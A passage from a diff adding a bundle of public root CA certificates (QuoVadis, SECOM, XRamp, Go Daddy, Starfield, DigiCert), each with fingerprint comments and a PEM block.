ca:3a:fb:cf:12:40:36:4b:44:b2:16:20:88:80:48:39:19:93:7c:f7 +# SHA256 Fingerprint: 85:a0:dd:7d:d7:20:ad:b7:ff:05:f8:3d:54:2b:20:9d:c7:ff:45:28:f7:d6:77:b1:83:89:fe:a5:e5:c4:9e:86 +-----BEGIN CERTIFICATE----- +MIIFtzCCA5+gAwIBAgICBQkwDQYJKoZIhvcNAQEFBQAwRTELMAkGA1UEBhMCQk0x +GTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxGzAZBgNVBAMTElF1b1ZhZGlzIFJv +b3QgQ0EgMjAeFw0wNjExMjQxODI3MDBaFw0zMTExMjQxODIzMzNaMEUxCzAJBgNV +BAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBMaW1pdGVkMRswGQYDVQQDExJRdW9W +YWRpcyBSb290IENBIDIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCa +GMpLlA0ALa8DKYrwD4HIrkwZhR0In6spRIXzL4GtMh6QRr+jhiYaHv5+HBg6XJxg +Fyo6dIMzMH1hVBHL7avg5tKifvVrbxi3Cgst/ek+7wrGsxDp3MJGF/hd/aTa/55J +WpzmM+Yklvc/ulsrHHo1wtZn/qtmUIttKGAr79dgw8eTvI02kfN/+NsRE8Scd3bB +rrcCaoF6qUWD4gXmuVbBlDePSHFjIuwXZQeVikvfj8ZaCuWw419eaxGrDPmF60Tp ++ARz8un+XJiM9XOva7R+zdRcAitMOeGylZUtQofX1bOQQ7dsE/He3fbE+Ik/0XX1 +ksOR1YqI0JDs3G3eicJlcZaLDQP9nL9bFqyS2+r+eXyt66/3FsvbzSUr5R/7mp/i +Ucw6UwxI5g69ybR2BlLmEROFcmMDBOAENisgGQLodKcftslWZvB1JdxnwQ5hYIiz +PtGo/KPaHbDRsSNU30R2be1B2MGyIrZTHN81Hdyhdyox5C315eXbyOD/5YDXC2Og +/zOhD7osFRXql7PSorW+8oyWHhqPHWykYTe5hnMz15eWniN9gqRMgeKh0bpnX5UH +oycR7hYQe7xFSkyyBNKr79X9DFHOUGoIMfmR2gyPZFwDwzqLID9ujWc9Otb+fVuI +yV77zGHcizN300QyNQliBJIWENieJ0f7OyHj+OsdWwIDAQABo4GwMIGtMA8GA1Ud +EwEB/wQFMAMBAf8wCwYDVR0PBAQDAgEGMB0GA1UdDgQWBBQahGK8SEwzJQTU7tD2 +A8QZRtGUazBuBgNVHSMEZzBlgBQahGK8SEwzJQTU7tD2A8QZRtGUa6FJpEcwRTEL +MAkGA1UEBhMCQk0xGTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxGzAZBgNVBAMT +ElF1b1ZhZGlzIFJvb3QgQ0EgMoICBQkwDQYJKoZIhvcNAQEFBQADggIBAD4KFk2f +BluornFdLwUvZ+YTRYPENvbzwCYMDbVHZF34tHLJRqUDGCdViXh9duqWNIAXINzn +g/iN/Ae42l9NLmeyhP3ZRPx3UIHmfLTJDQtyU/h2BwdBR5YM++CCJpNVjP4iH2Bl +fF/nJrP3MpCYUNQ3cVX2kiF495V5+vgtJodmVjB3pjd4M1IQWK4/YY7yarHvGH5K +WWPKjaJW1acvvFYfzznB4vsKqBUsfU16Y8Zsl0Q80m/DShcK+JDSV6IZUaUtl0Ha +B0+pUNqQjZRG4T7wlP0QADj1O+hA4bRuVhogzG9Yje0uRY/W6ZM/57Es3zrWIozc +hLsib9D45MY56QSIPMO661V6bYCZJPVsAfv4l7CUW+v90m/xd2gNNWQjrLhVoQPR +TUIZ3Ph1WVaj+ahJefivDrkRoHy3au000LYmYjgahwz46P0u05B/B5EqHdZ+XIWD +mbA4CD/pXvk1B+TJYm5Xf6dQlfe6yJvmjqIBxdZmv3lh8zwc4bmCXF2gw+nYSL0Z 
+ohEUGW6yhhtoPkg3Goi3XZZenMfvJ2II4pEZXNLxId26F0KCl3GBUzGpn/Z9Yr9y +4aOTHcyKJloJONDO1w2AFrR4pTqHTI2KpdVGl/IsELm8VCLAAVBpQ570su9t+Oza +8eOx79+Rj1QqCyXBJhnEUhAFZdWCEOrCMc0u +-----END CERTIFICATE----- + +# Issuer: CN=QuoVadis Root CA 3 O=QuoVadis Limited +# Subject: CN=QuoVadis Root CA 3 O=QuoVadis Limited +# Label: "QuoVadis Root CA 3" +# Serial: 1478 +# MD5 Fingerprint: 31:85:3c:62:94:97:63:b9:aa:fd:89:4e:af:6f:e0:cf +# SHA1 Fingerprint: 1f:49:14:f7:d8:74:95:1d:dd:ae:02:c0:be:fd:3a:2d:82:75:51:85 +# SHA256 Fingerprint: 18:f1:fc:7f:20:5d:f8:ad:dd:eb:7f:e0:07:dd:57:e3:af:37:5a:9c:4d:8d:73:54:6b:f4:f1:fe:d1:e1:8d:35 +-----BEGIN CERTIFICATE----- +MIIGnTCCBIWgAwIBAgICBcYwDQYJKoZIhvcNAQEFBQAwRTELMAkGA1UEBhMCQk0x +GTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxGzAZBgNVBAMTElF1b1ZhZGlzIFJv +b3QgQ0EgMzAeFw0wNjExMjQxOTExMjNaFw0zMTExMjQxOTA2NDRaMEUxCzAJBgNV +BAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBMaW1pdGVkMRswGQYDVQQDExJRdW9W +YWRpcyBSb290IENBIDMwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDM +V0IWVJzmmNPTTe7+7cefQzlKZbPoFog02w1ZkXTPkrgEQK0CSzGrvI2RaNggDhoB +4hp7Thdd4oq3P5kazethq8Jlph+3t723j/z9cI8LoGe+AaJZz3HmDyl2/7FWeUUr +H556VOijKTVopAFPD6QuN+8bv+OPEKhyq1hX51SGyMnzW9os2l2ObjyjPtr7guXd +8lyyBTNvijbO0BNO/79KDDRMpsMhvVAEVeuxu537RR5kFd5VAYwCdrXLoT9Cabwv +vWhDFlaJKjdhkf2mrk7AyxRllDdLkgbvBNDInIjbC3uBr7E9KsRlOni27tyAsdLT +mZw67mtaa7ONt9XOnMK+pUsvFrGeaDsGb659n/je7Mwpp5ijJUMv7/FfJuGITfhe +btfZFG4ZM2mnO4SJk8RTVROhUXhA+LjJou57ulJCg54U7QVSWllWp5f8nT8KKdjc +T5EOE7zelaTfi5m+rJsziO+1ga8bxiJTyPbH7pcUsMV8eFLI8M5ud2CEpukqdiDt +WAEXMJPpGovgc2PZapKUSU60rUqFxKMiMPwJ7Wgic6aIDFUhWMXhOp8q3crhkODZ +c6tsgLjoC2SToJyMGf+z0gzskSaHirOi4XCPLArlzW1oUevaPwV/izLmE1xr/l9A +4iLItLRkT9a6fUg+qGkM17uGcclzuD87nSVL2v9A6wIDAQABo4IBlTCCAZEwDwYD +VR0TAQH/BAUwAwEB/zCB4QYDVR0gBIHZMIHWMIHTBgkrBgEEAb5YAAMwgcUwgZMG +CCsGAQUFBwICMIGGGoGDQW55IHVzZSBvZiB0aGlzIENlcnRpZmljYXRlIGNvbnN0 +aXR1dGVzIGFjY2VwdGFuY2Ugb2YgdGhlIFF1b1ZhZGlzIFJvb3QgQ0EgMyBDZXJ0 +aWZpY2F0ZSBQb2xpY3kgLyBDZXJ0aWZpY2F0aW9uIFByYWN0aWNlIFN0YXRlbWVu +dC4wLQYIKwYBBQUHAgEWIWh0dHA6Ly93d3cucXVvdmFkaXNnbG9iYWwuY29tL2Nw +czALBgNVHQ8EBAMCAQYwHQYDVR0OBBYEFPLAE+CCQz777i9nMpY1XNu4ywLQMG4G +A1UdIwRnMGWAFPLAE+CCQz777i9nMpY1XNu4ywLQoUmkRzBFMQswCQYDVQQGEwJC +TTEZMBcGA1UEChMQUXVvVmFkaXMgTGltaXRlZDEbMBkGA1UEAxMSUXVvVmFkaXMg +Um9vdCBDQSAzggIFxjANBgkqhkiG9w0BAQUFAAOCAgEAT62gLEz6wPJv92ZVqyM0 +7ucp2sNbtrCD2dDQ4iH782CnO11gUyeim/YIIirnv6By5ZwkajGxkHon24QRiSem +d1o417+shvzuXYO8BsbRd2sPbSQvS3pspweWyuOEn62Iix2rFo1bZhfZFvSLgNLd ++LJ2w/w4E6oM3kJpK27zPOuAJ9v1pkQNn1pVWQvVDVJIxa6f8i+AxeoyUDUSly7B +4f/xI4hROJ/yZlZ25w9Rl6VSDE1JUZU2Pb+iSwwQHYaZTKrzchGT5Or2m9qoXadN +t54CrnMAyNojA+j56hl0YgCUyyIgvpSnWbWCar6ZeXqp8kokUvd0/bpO5qgdAm6x +DYBEwa7TIzdfu4V8K5Iu6H6li92Z4b8nby1dqnuH/grdS/yO9SbkbnBCbjPsMZ57 +k8HkyWkaPcBrTiJt7qtYTcbQQcEr6k8Sh17rRdhs9ZgC06DYVYoGmRmioHfRMJ6s +zHXug/WwYjnPbFfiTNKRCw51KBuav/0aQ/HKd/s7j2G4aSgWQgRecCocIdiP4b0j +Wy10QJLZYxkNc91pvGJHvOB0K7Lrfb5BG7XARsWhIstfTsEokt4YutUqKLsRixeT +mJlglFwjz1onl14LBQaTNx47aTbrqZ5hHY8y2o4M1nQ+ewkk2gF3R8Q7zTSMmfXK +4SVhM7JZG+Ju1zdXtg2pEto= +-----END CERTIFICATE----- + +# Issuer: O=SECOM Trust.net OU=Security Communication RootCA1 +# Subject: O=SECOM Trust.net OU=Security Communication RootCA1 +# Label: "Security Communication Root CA" +# Serial: 0 +# MD5 Fingerprint: f1:bc:63:6a:54:e0:b5:27:f5:cd:e7:1a:e3:4d:6e:4a +# SHA1 Fingerprint: 36:b1:2b:49:f9:81:9e:d7:4c:9e:bc:38:0f:c6:56:8f:5d:ac:b2:f7 +# SHA256 Fingerprint: e7:5e:72:ed:9f:56:0e:ec:6e:b4:80:00:73:a4:3f:c3:ad:19:19:5a:39:22:82:01:78:95:97:4a:99:02:6b:6c +-----BEGIN CERTIFICATE----- 
+MIIDWjCCAkKgAwIBAgIBADANBgkqhkiG9w0BAQUFADBQMQswCQYDVQQGEwJKUDEY +MBYGA1UEChMPU0VDT00gVHJ1c3QubmV0MScwJQYDVQQLEx5TZWN1cml0eSBDb21t +dW5pY2F0aW9uIFJvb3RDQTEwHhcNMDMwOTMwMDQyMDQ5WhcNMjMwOTMwMDQyMDQ5 +WjBQMQswCQYDVQQGEwJKUDEYMBYGA1UEChMPU0VDT00gVHJ1c3QubmV0MScwJQYD +VQQLEx5TZWN1cml0eSBDb21tdW5pY2F0aW9uIFJvb3RDQTEwggEiMA0GCSqGSIb3 +DQEBAQUAA4IBDwAwggEKAoIBAQCzs/5/022x7xZ8V6UMbXaKL0u/ZPtM7orw8yl8 +9f/uKuDp6bpbZCKamm8sOiZpUQWZJtzVHGpxxpp9Hp3dfGzGjGdnSj74cbAZJ6kJ +DKaVv0uMDPpVmDvY6CKhS3E4eayXkmmziX7qIWgGmBSWh9JhNrxtJ1aeV+7AwFb9 +Ms+k2Y7CI9eNqPPYJayX5HA49LY6tJ07lyZDo6G8SVlyTCMwhwFY9k6+HGhWZq/N +QV3Is00qVUarH9oe4kA92819uZKAnDfdDJZkndwi92SL32HeFZRSFaB9UslLqCHJ +xrHty8OVYNEP8Ktw+N/LTX7s1vqr2b1/VPKl6Xn62dZ2JChzAgMBAAGjPzA9MB0G +A1UdDgQWBBSgc0mZaNyFW2XjmygvV5+9M7wHSDALBgNVHQ8EBAMCAQYwDwYDVR0T +AQH/BAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAaECpqLvkT115swW1F7NgE+vG +kl3g0dNq/vu+m22/xwVtWSDEHPC32oRYAmP6SBbvT6UL90qY8j+eG61Ha2POCEfr +Uj94nK9NrvjVT8+amCoQQTlSxN3Zmw7vkwGusi7KaEIkQmywszo+zenaSMQVy+n5 +Bw+SUEmK3TGXX8npN6o7WWWXlDLJs58+OmJYxUmtYg5xpTKqL8aJdkNAExNnPaJU +JRDL8Try2frbSVa7pv6nQTXD4IhhyYjH3zYQIphZ6rBK+1YWc26sTfcioU+tHXot +RSflMMFe8toTyyVCUZVHA4xsIcx0Qu1T/zOLjw9XARYvz6buyXAiFL39vmwLAw== +-----END CERTIFICATE----- + +# Issuer: CN=XRamp Global Certification Authority O=XRamp Security Services Inc OU=www.xrampsecurity.com +# Subject: CN=XRamp Global Certification Authority O=XRamp Security Services Inc OU=www.xrampsecurity.com +# Label: "XRamp Global CA Root" +# Serial: 107108908803651509692980124233745014957 +# MD5 Fingerprint: a1:0b:44:b3:ca:10:d8:00:6e:9d:0f:d8:0f:92:0a:d1 +# SHA1 Fingerprint: b8:01:86:d1:eb:9c:86:a5:41:04:cf:30:54:f3:4c:52:b7:e5:58:c6 +# SHA256 Fingerprint: ce:cd:dc:90:50:99:d8:da:df:c5:b1:d2:09:b7:37:cb:e2:c1:8c:fb:2c:10:c0:ff:0b:cf:0d:32:86:fc:1a:a2 +-----BEGIN CERTIFICATE----- +MIIEMDCCAxigAwIBAgIQUJRs7Bjq1ZxN1ZfvdY+grTANBgkqhkiG9w0BAQUFADCB +gjELMAkGA1UEBhMCVVMxHjAcBgNVBAsTFXd3dy54cmFtcHNlY3VyaXR5LmNvbTEk +MCIGA1UEChMbWFJhbXAgU2VjdXJpdHkgU2VydmljZXMgSW5jMS0wKwYDVQQDEyRY +UmFtcCBHbG9iYWwgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMDQxMTAxMTcx +NDA0WhcNMzUwMTAxMDUzNzE5WjCBgjELMAkGA1UEBhMCVVMxHjAcBgNVBAsTFXd3 +dy54cmFtcHNlY3VyaXR5LmNvbTEkMCIGA1UEChMbWFJhbXAgU2VjdXJpdHkgU2Vy +dmljZXMgSW5jMS0wKwYDVQQDEyRYUmFtcCBHbG9iYWwgQ2VydGlmaWNhdGlvbiBB +dXRob3JpdHkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCYJB69FbS6 +38eMpSe2OAtp87ZOqCwuIR1cRN8hXX4jdP5efrRKt6atH67gBhbim1vZZ3RrXYCP +KZ2GG9mcDZhtdhAoWORlsH9KmHmf4MMxfoArtYzAQDsRhtDLooY2YKTVMIJt2W7Q +DxIEM5dfT2Fa8OT5kavnHTu86M/0ay00fOJIYRyO82FEzG+gSqmUsE3a56k0enI4 +qEHMPJQRfevIpoy3hsvKMzvZPTeL+3o+hiznc9cKV6xkmxnr9A8ECIqsAxcZZPRa +JSKNNCyy9mgdEm3Tih4U2sSPpuIjhdV6Db1q4Ons7Be7QhtnqiXtRYMh/MHJfNVi +PvryxS3T/dRlAgMBAAGjgZ8wgZwwEwYJKwYBBAGCNxQCBAYeBABDAEEwCwYDVR0P +BAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFMZPoj0GY4QJnM5i5ASs +jVy16bYbMDYGA1UdHwQvMC0wK6ApoCeGJWh0dHA6Ly9jcmwueHJhbXBzZWN1cml0 +eS5jb20vWEdDQS5jcmwwEAYJKwYBBAGCNxUBBAMCAQEwDQYJKoZIhvcNAQEFBQAD +ggEBAJEVOQMBG2f7Shz5CmBbodpNl2L5JFMn14JkTpAuw0kbK5rc/Kh4ZzXxHfAR +vbdI4xD2Dd8/0sm2qlWkSLoC295ZLhVbO50WfUfXN+pfTXYSNrsf16GBBEYgoyxt +qZ4Bfj8pzgCT3/3JknOJiWSe5yvkHJEs0rnOfc5vMZnT5r7SHpDwCRR5XCOrTdLa +IR9NmXmd4c8nnxCbHIgNsIpkQTG4DmyQJKSbXHGPurt+HBvbaoAPIbzp26a3QPSy +i6mx5O+aGtA9aZnuqCij4Tyz8LIRnM98QObd50N9otg6tamN8jSZxNQQ4Qb9CYQQ +O+7ETPTsJ3xCwnR8gooJybQDJbw= +-----END CERTIFICATE----- + +# Issuer: O=The Go Daddy Group, Inc. OU=Go Daddy Class 2 Certification Authority +# Subject: O=The Go Daddy Group, Inc. 
OU=Go Daddy Class 2 Certification Authority +# Label: "Go Daddy Class 2 CA" +# Serial: 0 +# MD5 Fingerprint: 91:de:06:25:ab:da:fd:32:17:0c:bb:25:17:2a:84:67 +# SHA1 Fingerprint: 27:96:ba:e6:3f:18:01:e2:77:26:1b:a0:d7:77:70:02:8f:20:ee:e4 +# SHA256 Fingerprint: c3:84:6b:f2:4b:9e:93:ca:64:27:4c:0e:c6:7c:1e:cc:5e:02:4f:fc:ac:d2:d7:40:19:35:0e:81:fe:54:6a:e4 +-----BEGIN CERTIFICATE----- +MIIEADCCAuigAwIBAgIBADANBgkqhkiG9w0BAQUFADBjMQswCQYDVQQGEwJVUzEh +MB8GA1UEChMYVGhlIEdvIERhZGR5IEdyb3VwLCBJbmMuMTEwLwYDVQQLEyhHbyBE +YWRkeSBDbGFzcyAyIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTA0MDYyOTE3 +MDYyMFoXDTM0MDYyOTE3MDYyMFowYzELMAkGA1UEBhMCVVMxITAfBgNVBAoTGFRo +ZSBHbyBEYWRkeSBHcm91cCwgSW5jLjExMC8GA1UECxMoR28gRGFkZHkgQ2xhc3Mg +MiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTCCASAwDQYJKoZIhvcNAQEBBQADggEN +ADCCAQgCggEBAN6d1+pXGEmhW+vXX0iG6r7d/+TvZxz0ZWizV3GgXne77ZtJ6XCA +PVYYYwhv2vLM0D9/AlQiVBDYsoHUwHU9S3/Hd8M+eKsaA7Ugay9qK7HFiH7Eux6w +wdhFJ2+qN1j3hybX2C32qRe3H3I2TqYXP2WYktsqbl2i/ojgC95/5Y0V4evLOtXi +EqITLdiOr18SPaAIBQi2XKVlOARFmR6jYGB0xUGlcmIbYsUfb18aQr4CUWWoriMY +avx4A6lNf4DD+qta/KFApMoZFv6yyO9ecw3ud72a9nmYvLEHZ6IVDd2gWMZEewo+ +YihfukEHU1jPEX44dMX4/7VpkI+EdOqXG68CAQOjgcAwgb0wHQYDVR0OBBYEFNLE +sNKR1EwRcbNhyz2h/t2oatTjMIGNBgNVHSMEgYUwgYKAFNLEsNKR1EwRcbNhyz2h +/t2oatTjoWekZTBjMQswCQYDVQQGEwJVUzEhMB8GA1UEChMYVGhlIEdvIERhZGR5 +IEdyb3VwLCBJbmMuMTEwLwYDVQQLEyhHbyBEYWRkeSBDbGFzcyAyIENlcnRpZmlj +YXRpb24gQXV0aG9yaXR5ggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQAD +ggEBADJL87LKPpH8EsahB4yOd6AzBhRckB4Y9wimPQoZ+YeAEW5p5JYXMP80kWNy +OO7MHAGjHZQopDH2esRU1/blMVgDoszOYtuURXO1v0XJJLXVggKtI3lpjbi2Tc7P +TMozI+gciKqdi0FuFskg5YmezTvacPd+mSYgFFQlq25zheabIZ0KbIIOqPjCDPoQ +HmyW74cNxA9hi63ugyuV+I6ShHI56yDqg+2DzZduCLzrTia2cyvk0/ZM/iZx4mER +dEr/VxqHD3VILs9RaRegAhJhldXRQLIQTO7ErBBDpqWeCtWVYpoNz4iCxTIM5Cuf +ReYNnyicsbkqWletNw+vHX/bvZ8= +-----END CERTIFICATE----- + +# Issuer: O=Starfield Technologies, Inc. OU=Starfield Class 2 Certification Authority +# Subject: O=Starfield Technologies, Inc. 
OU=Starfield Class 2 Certification Authority +# Label: "Starfield Class 2 CA" +# Serial: 0 +# MD5 Fingerprint: 32:4a:4b:bb:c8:63:69:9b:be:74:9a:c6:dd:1d:46:24 +# SHA1 Fingerprint: ad:7e:1c:28:b0:64:ef:8f:60:03:40:20:14:c3:d0:e3:37:0e:b5:8a +# SHA256 Fingerprint: 14:65:fa:20:53:97:b8:76:fa:a6:f0:a9:95:8e:55:90:e4:0f:cc:7f:aa:4f:b7:c2:c8:67:75:21:fb:5f:b6:58 +-----BEGIN CERTIFICATE----- +MIIEDzCCAvegAwIBAgIBADANBgkqhkiG9w0BAQUFADBoMQswCQYDVQQGEwJVUzEl +MCMGA1UEChMcU3RhcmZpZWxkIFRlY2hub2xvZ2llcywgSW5jLjEyMDAGA1UECxMp +U3RhcmZpZWxkIENsYXNzIDIgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMDQw +NjI5MTczOTE2WhcNMzQwNjI5MTczOTE2WjBoMQswCQYDVQQGEwJVUzElMCMGA1UE +ChMcU3RhcmZpZWxkIFRlY2hub2xvZ2llcywgSW5jLjEyMDAGA1UECxMpU3RhcmZp +ZWxkIENsYXNzIDIgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwggEgMA0GCSqGSIb3 +DQEBAQUAA4IBDQAwggEIAoIBAQC3Msj+6XGmBIWtDBFk385N78gDGIc/oav7PKaf +8MOh2tTYbitTkPskpD6E8J7oX+zlJ0T1KKY/e97gKvDIr1MvnsoFAZMej2YcOadN ++lq2cwQlZut3f+dZxkqZJRRU6ybH838Z1TBwj6+wRir/resp7defqgSHo9T5iaU0 +X9tDkYI22WY8sbi5gv2cOj4QyDvvBmVmepsZGD3/cVE8MC5fvj13c7JdBmzDI1aa +K4UmkhynArPkPw2vCHmCuDY96pzTNbO8acr1zJ3o/WSNF4Azbl5KXZnJHoe0nRrA +1W4TNSNe35tfPe/W93bC6j67eA0cQmdrBNj41tpvi/JEoAGrAgEDo4HFMIHCMB0G +A1UdDgQWBBS/X7fRzt0fhvRbVazc1xDCDqmI5zCBkgYDVR0jBIGKMIGHgBS/X7fR +zt0fhvRbVazc1xDCDqmI56FspGowaDELMAkGA1UEBhMCVVMxJTAjBgNVBAoTHFN0 +YXJmaWVsZCBUZWNobm9sb2dpZXMsIEluYy4xMjAwBgNVBAsTKVN0YXJmaWVsZCBD +bGFzcyAyIENlcnRpZmljYXRpb24gQXV0aG9yaXR5ggEAMAwGA1UdEwQFMAMBAf8w +DQYJKoZIhvcNAQEFBQADggEBAAWdP4id0ckaVaGsafPzWdqbAYcaT1epoXkJKtv3 +L7IezMdeatiDh6GX70k1PncGQVhiv45YuApnP+yz3SFmH8lU+nLMPUxA2IGvd56D +eruix/U0F47ZEUD0/CwqTRV/p2JdLiXTAAsgGh1o+Re49L2L7ShZ3U0WixeDyLJl +xy16paq8U4Zt3VekyvggQQto8PT7dL5WXXp59fkdheMtlb71cZBDzI0fmgAKhynp +VSJYACPq4xJDKVtHCN2MQWplBqjlIapBtJUhlbl90TSrE9atvNziPTnNvT51cKEY +WQPJIrSPnNVeKtelttQKbfi3QBFGmh95DmK/D5fs4C8fF5Q= +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert Assured ID Root CA O=DigiCert Inc OU=www.digicert.com +# Subject: CN=DigiCert Assured ID Root CA O=DigiCert Inc OU=www.digicert.com +# Label: "DigiCert Assured ID Root CA" +# Serial: 17154717934120587862167794914071425081 +# MD5 Fingerprint: 87:ce:0b:7b:2a:0e:49:00:e1:58:71:9b:37:a8:93:72 +# SHA1 Fingerprint: 05:63:b8:63:0d:62:d7:5a:bb:c8:ab:1e:4b:df:b5:a8:99:b2:4d:43 +# SHA256 Fingerprint: 3e:90:99:b5:01:5e:8f:48:6c:00:bc:ea:9d:11:1e:e7:21:fa:ba:35:5a:89:bc:f1:df:69:56:1e:3d:c6:32:5c +-----BEGIN CERTIFICATE----- +MIIDtzCCAp+gAwIBAgIQDOfg5RfYRv6P5WD8G/AwOTANBgkqhkiG9w0BAQUFADBl +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv +b3QgQ0EwHhcNMDYxMTEwMDAwMDAwWhcNMzExMTEwMDAwMDAwWjBlMQswCQYDVQQG +EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl +cnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgQ0EwggEi +MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCtDhXO5EOAXLGH87dg+XESpa7c +JpSIqvTO9SA5KFhgDPiA2qkVlTJhPLWxKISKityfCgyDF3qPkKyK53lTXDGEKvYP +mDI2dsze3Tyoou9q+yHyUmHfnyDXH+Kx2f4YZNISW1/5WBg1vEfNoTb5a3/UsDg+ +wRvDjDPZ2C8Y/igPs6eD1sNuRMBhNZYW/lmci3Zt1/GiSw0r/wty2p5g0I6QNcZ4 +VYcgoc/lbQrISXwxmDNsIumH0DJaoroTghHtORedmTpyoeb6pNnVFzF1roV9Iq4/ +AUaG9ih5yLHa5FcXxH4cDrC0kqZWs72yl+2qp/C3xag/lRbQ/6GW6whfGHdPAgMB +AAGjYzBhMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW +BBRF66Kv9JLLgjEtUYunpyGd823IDzAfBgNVHSMEGDAWgBRF66Kv9JLLgjEtUYun +pyGd823IDzANBgkqhkiG9w0BAQUFAAOCAQEAog683+Lt8ONyc3pklL/3cmbYMuRC +dWKuh+vy1dneVrOfzM4UKLkNl2BcEkxY5NM9g0lFWJc1aRqoR+pWxnmrEthngYTf +fwk8lOa4JiwgvT2zKIn3X/8i4peEH+ll74fg38FnSbNd67IJKusm7Xi+fT8r87cm 
+NW1fiQG2SVufAQWbqz0lwcy2f8Lxb4bG+mRo64EtlOtCt/qMHt1i8b5QZ7dsvfPx +H2sMNgcWfzd8qVttevESRmCD1ycEvkvOl77DZypoEd+A5wwzZr8TDRRu838fYxAe ++o0bJW1sj6W3YQGx0qMmoRBxna3iw/nDmVG3KwcIzi7mULKn+gpFL6Lw8g== +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert Global Root CA O=DigiCert Inc OU=www.digicert.com +# Subject: CN=DigiCert Global Root CA O=DigiCert Inc OU=www.digicert.com +# Label: "DigiCert Global Root CA" +# Serial: 10944719598952040374951832963794454346 +# MD5 Fingerprint: 79:e4:a9:84:0d:7d:3a:96:d7:c0:4f:e2:43:4c:89:2e +# SHA1 Fingerprint: a8:98:5d:3a:65:e5:e5:c4:b2:d7:d6:6d:40:c6:dd:2f:b1:9c:54:36 +# SHA256 Fingerprint: 43:48:a0:e9:44:4c:78:cb:26:5e:05:8d:5e:89:44:b4:d8:4f:96:62:bd:26:db:25:7f:89:34:a4:43:c7:01:61 +-----BEGIN CERTIFICATE----- +MIIDrzCCApegAwIBAgIQCDvgVpBCRrGhdWrJWZHHSjANBgkqhkiG9w0BAQUFADBh +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBD +QTAeFw0wNjExMTAwMDAwMDBaFw0zMTExMTAwMDAwMDBaMGExCzAJBgNVBAYTAlVT +MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j +b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IENBMIIBIjANBgkqhkiG +9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4jvhEXLeqKTTo1eqUKKPC3eQyaKl7hLOllsB +CSDMAZOnTjC3U/dDxGkAV53ijSLdhwZAAIEJzs4bg7/fzTtxRuLWZscFs3YnFo97 +nh6Vfe63SKMI2tavegw5BmV/Sl0fvBf4q77uKNd0f3p4mVmFaG5cIzJLv07A6Fpt +43C/dxC//AH2hdmoRBBYMql1GNXRor5H4idq9Joz+EkIYIvUX7Q6hL+hqkpMfT7P +T19sdl6gSzeRntwi5m3OFBqOasv+zbMUZBfHWymeMr/y7vrTC0LUq7dBMtoM1O/4 +gdW7jVg/tRvoSSiicNoxBN33shbyTApOB6jtSj1etX+jkMOvJwIDAQABo2MwYTAO +BgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUA95QNVbR +TLtm8KPiGxvDl7I90VUwHwYDVR0jBBgwFoAUA95QNVbRTLtm8KPiGxvDl7I90VUw +DQYJKoZIhvcNAQEFBQADggEBAMucN6pIExIK+t1EnE9SsPTfrgT1eXkIoyQY/Esr +hMAtudXH/vTBH1jLuG2cenTnmCmrEbXjcKChzUyImZOMkXDiqw8cvpOp/2PV5Adg +06O/nVsJ8dWO41P0jmP6P6fbtGbfYmbW0W5BjfIttep3Sp+dWOIrWcBAI+0tKIJF +PnlUkiaY4IBIqDfv8NZ5YBberOgOzW6sRBc4L0na4UU+Krk2U886UAb3LujEV0ls +YSEY1QSteDwsOoBrp+uvFRTp2InBuThs4pFsiv9kuXclVzDAGySj4dzp30d8tbQk +CAUw7C29C79Fv1C5qfPrmAESrciIxpg0X40KPMbp1ZWVbd4= +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert High Assurance EV Root CA O=DigiCert Inc OU=www.digicert.com +# Subject: CN=DigiCert High Assurance EV Root CA O=DigiCert Inc OU=www.digicert.com +# Label: "DigiCert High Assurance EV Root CA" +# Serial: 3553400076410547919724730734378100087 +# MD5 Fingerprint: d4:74:de:57:5c:39:b2:d3:9c:85:83:c5:c0:65:49:8a +# SHA1 Fingerprint: 5f:b7:ee:06:33:e2:59:db:ad:0c:4c:9a:e6:d3:8f:1a:61:c7:dc:25 +# SHA256 Fingerprint: 74:31:e5:f4:c3:c1:ce:46:90:77:4f:0b:61:e0:54:40:88:3b:a9:a0:1e:d0:0b:a6:ab:d7:80:6e:d3:b1:18:cf +-----BEGIN CERTIFICATE----- +MIIDxTCCAq2gAwIBAgIQAqxcJmoLQJuPC3nyrkYldzANBgkqhkiG9w0BAQUFADBs 